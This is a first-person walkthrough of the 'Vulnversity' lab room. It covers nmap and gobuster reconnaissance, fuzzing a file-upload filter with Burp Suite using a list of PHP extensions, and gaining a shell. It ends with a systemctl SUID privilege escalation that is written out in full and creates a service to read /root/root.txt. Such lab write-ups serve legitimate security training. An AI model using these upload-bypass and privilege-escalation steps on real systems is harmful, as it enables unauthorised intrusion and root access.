Vulnversity

Task 1  Deploy the machine

Task 2  Reconnaissance

There are many Nmap “cheatsheets” online that you can use too.

A quick google search can help or running nmap –help

Scan the box; how many ports are open?

For this I started with nmap -sV -v -O (target ip)

What version of the squid proxy is running on the machine?

Since we ran sV we can already see squid is 3.5.12

How many ports will Nmap scan if the flag -p-400 was used?

I know that -p-400 will scan through 400

What is the most likely operating system this machine is running?

Since I ran the -O flag already we could see it was Ubuntu

What port is the web server running on?

We can see that the apache server is rung on port 3333

It’s essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).

What is the flag for enabling verbose mode using Nmap?

We know from our reading -v is verbose

Task 3  Locating directories using Gobuster


What is the directory that has an upload form page?

First we run

gobuster dir -u <ip>:<port> -w <wordlist-path> Now we can see that we have a few places to look we can use the same syntax just with /css after the port for example

Task 4  Compromise the Webserver
What common file type you’d want to upload to exploit the server is blocked? Try a couple to find out.

If we go to the website and try to upload different files we will find .php files are blocked

We will fuzz the upload form to identify which extensions are not blocked.

To do this, we’re going to use BurpSuite. If you need clarification on what BurpSuite is or how to set it up, please complete our BurpSuite module first.

Run this attack, what extension is allowed?

  • First we need to create a payload list adding
  • .php
  • .php3
  • .php4
  • .php5
  • .phtml

Next we need to capture the upload so we navigate to the target ip:3333/internal/. Now we can make sure our intercepter is on and capture the upload next we send it to intruder. After its in intruder we can make sure the payload is set and also add shell §.php §. Then we can run our attack. We can see the phtml has a smaller value than the others.

What is the name of the user who manages the webserver?

For this we need to get a reverse shell if we follow the instructions given we can achieve this. Once our shell is connected we can see a home directory and bill is user listed.

What is the user flag?

For this we can just cd into bill and ls and then we see a user.txt and if we cat that we get the flag

Task 5  Privilege Escalation

On the system, search for all SUID files. Which file stands out?

For this we need to see what has the suid bit set, we can find this out but running the command in the hint find / -user root -perm -4000 -exec ls -ldb {} \;

It’s challenge time! We have guided you through this far. Can you exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

This took a bit of work, first we know that systemctl maybe our way in so we can go to GTFObins and search and we can see two attack vectors and since our suid is set we can use the first one. The commands I ran were TF=$(mktemp).service

echo ‘[Service]

Type=oneshot

ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/outputroot”

[Install]

WantedBy=multi-user.target’ > $TF

/bin/systemctl link $TF

/bin/systemctl enable –now $TF

Doing this creates a temporary service which will allow us to view the the root file. Next we need to cd to /tmp/ because that’s where we sent the output file and then we can cat the output file to get our flag.